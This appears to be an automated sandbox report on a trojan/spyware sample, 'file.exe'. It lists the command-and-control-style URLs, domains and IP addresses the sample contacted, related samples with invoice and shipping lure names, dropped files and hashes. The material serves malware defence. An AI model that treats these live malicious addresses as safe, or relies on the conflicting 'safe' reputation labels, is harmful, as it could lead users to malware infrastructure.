http://www.sandpiper-apts.com/crhz/?Mkn=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTGHGtv/xv4Is4Luw==&vux=DmStydFUWc8HD	100%	Avira URL Cloud	malware
http://n-r-eng.com/crhz/?Mkn=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5	100%	Avira URL Cloud	malware
http://www.tf8dangky.online/crhz/	0%	Avira URL Cloud	safe
http://www.wenzid4.top/crhz/	0%	Avira URL Cloud	safe
http://www.wenzid4.top/crhz/1B4DD6~	0%	Avira URL Cloud	safe
http://www.teammart.online/crhz/	0%	Avira URL Cloud	safe
http://www.sandpiper-apts.com	0%	Avira URL Cloud	safe
http://www.hvlandscapes.biz/crhz/?Mkn=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XeQGQX6k9pc/6NhQ==&vux=DmStydFUWc8HD	0%	Avira URL Cloud	safe
http://www.teammart.onlineq	0%	Avira URL Cloud	safe
http://www.nortonseecurity.com/crhz/	0%	Avira URL Cloud	safe
http://www.sandpiper-apts.com/crhz/	100%	Avira URL Cloud	malware
http://www.nftspaceview.com~bm1	0%	Avira URL Cloud	safe
http://www.thepromotionhunter.com/crhz/	0%	Avira URL Cloud	safe
http://www.nftspaceview.com/crhz/	0%	Avira URL Cloud	safe
http://www.suachuadienlanh247.com/crhz/	0%	Avira URL Cloud	safe
http://www.frogair.online/crhz/	0%	Avira URL Cloud	safe
http://www.hvlandscapes.biz	0%	Avira URL Cloud	safe
http://www.wylvxing.com	0%	Avira URL Cloud	safe
http://www.nortonseecurity.com	0%	Avira URL Cloud	safe
http://www.laylaroseuk.com/crhz/	0%	Avira URL Cloud	safe
http://www.tf8dangky.online	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
hvlandscapes.biz	76.223.105.230	true	true	unknown
laylaroseuk.com	2.57.90.16	true	true	unknown
www.n-r-eng.com	185.151.199.52	true	true	unknown
www.teammart.online	184.94.215.91	true	true	unknown
www.sandpiper-apts.com	164.88.201.214	true	true	unknown
www.suachuadienlanh247.com	103.221.223.104	true	true	unknown
ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com	18.138.206.213	true	false	high
frogair.online	81.169.145.72	true	true	unknown
cname.u01.df.bkk1.cloud.z.com	163.44.198.50	true	false	high
www.tf8dangky.online	unknown	unknown	true	unknown
www.laylaroseuk.com	unknown	unknown	true	unknown
www.frogair.online	unknown	unknown	true	unknown
www.mitsubangsaen.online	unknown	unknown	true	unknown
www.hvlandscapes.biz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.frogair.online/crhz/?Mkn=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJDQAP7ZwMaqvgwrA==&vux=DmStydFUWc8HD	true	Avira URL Cloud: safe	unknown
http://www.laylaroseuk.com/crhz/?Mkn=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5xHn8QLAS8Zm4ynQ==&vux=DmStydFUWc8HD	true	Avira URL Cloud: safe	unknown
http://www.hvlandscapes.biz/crhz/	true	Avira URL Cloud: safe	unknown
http://www.teammart.online/crhz/?Mkn=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo2QZ2CGF/wkiG+Fw==&vux=DmStydFUWc8HD	true	Avira URL Cloud: safe	unknown
http://www.n-r-eng.com/crhz/	true	Avira URL Cloud: malware	unknown
http://www.tf8dangky.online/crhz/?Mkn=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEmRdiQ98V40n9u5A==&vux=DmStydFUWc8HD	true	Avira URL Cloud: safe	unknown
http://www.tf8dangky.online/crhz/	true	Avira URL Cloud: safe	unknown
http://www.n-r-eng.com/crhz/?Mkn=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5+pol+lVZCotPeZJEV3KnsQwBw1FpEdPbpeQCJZSqBlkKVIQIQyxkbVFYCGm9IFlQQ==&vux=DmStydFUWc8HD	true	Avira URL Cloud: malware	unknown
http://www.sandpiper-apts.com/crhz/?Mkn=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTGHGtv/xv4Is4Luw==&vux=DmStydFUWc8HD	true	Avira URL Cloud: malware	unknown
http://www.teammart.online/crhz/	true	Avira URL Cloud: safe	unknown
http://www.hvlandscapes.biz/crhz/?Mkn=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XeQGQX6k9pc/6NhQ==&vux=DmStydFUWc8HD	true	Avira URL Cloud: safe	unknown
http://www.sandpiper-apts.com/crhz/	true	Avira URL Cloud: malware	unknown
http://www.frogair.online/crhz/	true	Avira URL Cloud: safe	unknown
http://www.suachuadienlanh247.com/crhz/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	wlanext.exe, 0000000A.00000003.352512729.00000000071C1000.00000004.00000020.00020000.00000000.sdmp, 30q5648k6.10.dr	false		high
https://duckduckgo.com/ac/?q=	30q5648k6.10.dr	false		high
http://www.nftspaceview.com	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.frogair.online	explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.popcors.com/crhz/	explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mitsubangsaen.online	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mitsubangsaen.online/crhz/	explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com?fr=crmas_sfpf	wlanext.exe, 0000000A.00000003.352512729.00000000071C1000.00000004.00000020.00020000.00000000.sdmp, 30q5648k6.10.dr	false		high
http://www.laylaroseuk.com	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.teammart.online	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.tf8dangky.online/crhz/?Mkn=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T	explorer.exe, 00000002.00000002.540010102.00000000158DC000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 0000000A.00000002.526928605.0000000003C5C000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.popcors.comCR	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://hvlandscapes.biz/crhz/?Mkn=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR	explorer.exe, 00000002.00000002.540010102.0000000015D92000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 0000000A.00000002.526928605.0000000004112000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wenzid4.top	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hayuterce.com	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.n-r-eng.com	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.suachuadienlanh247.com	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wenzid4.topd	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wylvxing.com/crhz/	explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thepromotionhunter.com	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wenzid4.top/crhz/1B4DD6~	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	wlanext.exe, 0000000A.00000003.352512729.00000000071C1000.00000004.00000020.00020000.00000000.sdmp, 30q5648k6.10.dr	false		high
http://www.popcors.com	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hayuterce.com/crhz/	explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	30q5648k6.10.dr	false		high
http://n-r-eng.com/crhz/?Mkn=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5	explorer.exe, 00000002.00000002.540010102.00000000155B8000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 0000000A.00000002.526928605.0000000003938000.00000004.10000000.00040000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	wlanext.exe, 0000000A.00000003.352512729.00000000071C1000.00000004.00000020.00020000.00000000.sdmp, 30q5648k6.10.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	wlanext.exe, 0000000A.00000003.352512729.00000000071C1000.00000004.00000020.00020000.00000000.sdmp, 30q5648k6.10.dr	false		high
http://www.wenzid4.top/crhz/	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	30q5648k6.10.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	wlanext.exe, 0000000A.00000003.352512729.00000000071C1000.00000004.00000020.00020000.00000000.sdmp, 30q5648k6.10.dr	false		high
http://www.sandpiper-apts.com	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tf8dangky.online	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nortonseecurity.com/crhz/	explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nftspaceview.com~bm1	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.teammart.onlineq	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thepromotionhunter.com/crhz/	explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wylvxing.com	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nftspaceview.com/crhz/	explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	30q5648k6.10.dr	false		high
http://www.hvlandscapes.biz	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.laylaroseuk.com/crhz/	explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nortonseecurity.com	explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.151.199.52	www.n-r-eng.com	Israel	12400	PARTNER-ASIL	true
18.138.206.213	ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com	United States	16509	AMAZON-02US	false
81.169.145.72	frogair.online	Germany	6724	STRATOSTRATOAGDE	true
76.223.105.230	hvlandscapes.biz	United States	16509	AMAZON-02US	true
164.88.201.214	www.sandpiper-apts.com	South Africa	137951	CLAYERLIMITED-AS-APClayerLimitedHK	true
103.221.223.104	www.suachuadienlanh247.com	Viet Nam	18403	FPT-AS-APTheCorporationforFinancingPromotingTechnolo	true
2.57.90.16	laylaroseuk.com	Lithuania	47583	AS-HOSTINGERLT	true
184.94.215.91	www.teammart.online	United States	394896	VXCHNGE-NC01US	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	791404
Start date and time:	2023-01-25 13:20:09 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/2@9/8
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 12% (good quality ratio 11.2%) Quality average: 73.2% Quality standard deviation: 29.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 80 Number of non-executed functions: 160
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:21:26	API Interceptor	564x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
18.138.206.213	0ekqA0CV4E.exe	Get hash	malicious	Browse	www.cuahangdientuminhlong.net/r5dd/?b0=P99om3J/T/FRLJAwtrj40ngyT3b2utMucK82nkVWx+xFT/xaBYKtVk24JKdFxF3O+V30lC7dEVmSOjMip0UBKYMUGzj8t/IdkEE+LiU5QoNT&TdTp-=4hcx
	Urgent Request For Quotation.exe	Get hash	malicious	Browse	www.vienuongdamos1.click/snky/?OXFT7P=CrZdQH0pdxsX&DR-TO=SK+9X5h637+zVRkqNV0F/SPX3aow/LEUgHsJx0ifp4IsOmNALs/k8zD241IUoMJHkFP/+TgfiKCboFK3fJBLJF+yW5D4O6X3LA==
	Group_IV.exe	Get hash	malicious	Browse	www.granolanuts.online/hzb3/?YTbT=4hfLs&jZ_l=Xe6TyF1JOhQXt1xymtulG4JYzD/c+8bnf//7E2hxSfLHMVuMDvbU3Eyr3teeRQPXWOVjmTeFHQ6767mUOxLpS3q+4c9rE4Zsyw==
	Group_Invitation.exe	Get hash	malicious	Browse	www.granolanuts.online/hzb3/?n2Ml2P=nXrPh&k4=Xe6TyF1JOhQXt1xymtulG4JYzD/c+8bnf//7E2hxSfLHMVuMDvbU3Eyr3teeRQPXWOVjmTeFHQ6767mUOxLpS3q+4c9rE4Zsyw==
	HCM152611.exe	Get hash	malicious	Browse	www.suckhoecuocsong.tech/q0io/?4hWxO=Y6ADp&9rkH3ZO8=5tRFI8M3/JSTUeni4WA8h/PTXvbE7kX2e+pOlXs8QEjEIZVFWUWJBSt7+aUZquS+iVS4LoiZrxm72UeSXqDEge02GZQoUoy/+g==
	DHL Notification_pdf.exe	Get hash	malicious	Browse	www.hi88pro.online/g2e8/?c8wPTfYh=hHC0fVZJkTupkVGAJP54fDRir+upx/Q+y/tNblWMINid9FABSMS6rT2WgmrCh52ZNxTb&6lux=VZSXpzy0D
	GROUP INVITATION.exe	Get hash	malicious	Browse	www.granolanuts.online/hzb3/?6liTCD=PPsT&eV2=Xe6TyF1JOhQXt1xymtulG4JYzD/c+8bnf//7E2hxSfLHMVuMDvbU3Eyr3teeRQPXWOVjmTeFHQ6767mUOxLpS3q+4c9rE4Zsyw==
	DHL SHIPMENT NOTIFICATION_PDF.exe	Get hash	malicious	Browse	www.suckhoe4phuong-555.click/6cs0/?oX8=cPf0KzEX&6lp4qX=qrfk11bjIYCaXHFMLv2pBMgG1JQ0d71Y+uc3EWldY+sc3kzgf5kC/g1Py5b/6PRzF0QzmQMSSy6sSqMMKjtvFP/Jg7irNxVJJA==
	ORDER NO VOL- 6542 335 22.exe	Get hash	malicious	Browse	www.thaoduocvietvn.online/nquy/?JF=u9evqxZMGgKfs69v9/2xdXFxxN/YJ4WehP421wEp0tTEO3G6A3EDPphK1t7D3CuUE6PDuRldJIYEw0Z9Ouaa0Du1JdKkzys5Lg==&0vS=VvX878uHn6aDcRz
	Overdue SOA.exe	Get hash	malicious	Browse	www.vuongnudan.site/6hsc/?OBs8ph=rdmYyOqMEWNErD8nsvu9s8+DoEr3Pj0i98K/wPQF5Bsi0lFa+QKx/EeEATqH3j7a85s/&lFQ=VHApdxjPqB
	HSBC Customer Information.com.exe	Get hash	malicious	Browse	www.granolanuts.online/ogxr/?nFQTzL6=AQyG0md181Ogy/Ks6KWLVBza+i4BJWUNKi7fRYyk7j41v6Vps1vWMaydOUVV2ODUWQgKNmS7UAOIpV1hqCFnI/2b4MQwQX8Wgg==&jT2lTB=AZ-HKt
	Pepsico LLC RFQ Information.com.exe	Get hash	malicious	Browse	www.granolanuts.online/ogxr/?7nmPFn0=AQyG0md181Ogy/Ks6KWLVBza+i4BJWUNKi7fRYyk7j41v6Vps1vWMaydOUVV2ODUWQgKNmS7UAOIpV1hqCFnI/2b4MQwQX8Wgg==&kP2d-p=8pJX
	Pepsico LLC RFQ 100729150.com.exe	Get hash	malicious	Browse	www.granolanuts.online/ogxr/?x6yD=AQyG0md181Ogy/Ks6KWLVBza+i4BJWUNKi7fRYyk7j41v6Vps1vWMaydOUVV2ODUWQgKNmS7UAOIpV1hqCFnI/2b4MQwQX8Wgg==&eR-=1brXuvI

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com	Ux52yjN9J2.exe	Get hash	malicious	Browse	18.142.208.246
	0ekqA0CV4E.exe	Get hash	malicious	Browse	18.138.206.213
	Urgent Request For Quotation.exe	Get hash	malicious	Browse	18.138.206.213
	payment copy_$31,400.exe	Get hash	malicious	Browse	13.251.100.80
	RFQ.exe	Get hash	malicious	Browse	18.142.208.246
	TWO_MONTHS_SALARY_RECEIPT.exe	Get hash	malicious	Browse	18.142.208.246
	2W2wNDLhsl.exe	Get hash	malicious	Browse	18.142.208.246
	Group_invitation.exe	Get hash	malicious	Browse	18.142.208.246
	Group_IV.exe	Get hash	malicious	Browse	18.138.206.213
	Group_Invitation.exe	Get hash	malicious	Browse	18.138.206.213
	HCM152611.exe	Get hash	malicious	Browse	18.138.206.213
	DHL Notification_pdf.exe	Get hash	malicious	Browse	18.138.206.213
	GROUP INVITATION.exe	Get hash	malicious	Browse	18.138.206.213
	DHL INVOICE_PDF.exe	Get hash	malicious	Browse	18.142.208.246
	DHL SHIPMENT NOTIFICATION_PDF.exe	Get hash	malicious	Browse	18.138.206.213
	ORDER NO VOL- 6542 335 22.exe	Get hash	malicious	Browse	18.138.206.213
	Overdue SOA.exe	Get hash	malicious	Browse	18.138.206.213
	Re Payment confirmation against Pro-forma INV# 001PR2022, INV# 003PR2022.exe	Get hash	malicious	Browse	18.142.208.246
	HSBC Customer Information.com.exe	Get hash	malicious	Browse	18.138.206.213
	Pepsico LLC RFQ Information.com.exe	Get hash	malicious	Browse	18.138.206.213

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PARTNER-ASIL	wf5nAcVPV1.elf	Get hash	malicious	Browse	2.55.19.30
	Ur83Jcc2vY.elf	Get hash	malicious	Browse	176.230.220.23
	z3cSdM9V7h.elf	Get hash	malicious	Browse	176.231.92.112
	wEUDEoKUr8.elf	Get hash	malicious	Browse	2.55.156.154
	AsITRcUt8t.elf	Get hash	malicious	Browse	176.229.227.14
	hz7nI1U6H5.elf	Get hash	malicious	Browse	2.53.31.53
	8jK7X0Nc8M.elf	Get hash	malicious	Browse	31.154.123.133
	CTqo4JwsCU.elf	Get hash	malicious	Browse	31.154.123.100
	6sBmn1CQ1O.elf	Get hash	malicious	Browse	31.154.35.225
	WUeiLv48pb.elf	Get hash	malicious	Browse	31.154.35.249
	xmogum.i686.elf	Get hash	malicious	Browse	2.55.108.236
	dark.x86	Get hash	malicious	Browse	176.230.100.192
	CsCSQk1UOj.elf	Get hash	malicious	Browse	2.52.115.228
	0ZWx91rasR.elf	Get hash	malicious	Browse	2.53.105.148
	PSlc8imSQa.elf	Get hash	malicious	Browse	2.53.79.31
	sora.arm.elf	Get hash	malicious	Browse	2.55.156.150
	soI8yStlNX.elf	Get hash	malicious	Browse	2.55.156.148
	3PFX5qTLd5.elf	Get hash	malicious	Browse	176.228.155.129
	ascaris.x86_64.elf	Get hash	malicious	Browse	176.228.107.202
	wHLmHiPakK.elf	Get hash	malicious	Browse	2.53.80.193

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.3467126928258955
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
MD5:	DD8B7A943A5D834CEEAB90A6BBBF4781
SHA1:	2BED8D47DF1C0FF76B40811E5F11298BD2D06389
SHA-256:	E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
SHA-512:	24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

C:\Users\user\AppData\Local\Temp\30q5648k6

Download File

Process:	C:\Windows\SysWOW64\wlanext.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.972799928160775
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	file.exe
File size:	288768
MD5:	58b8732ed17532b518bd90b68b934b23
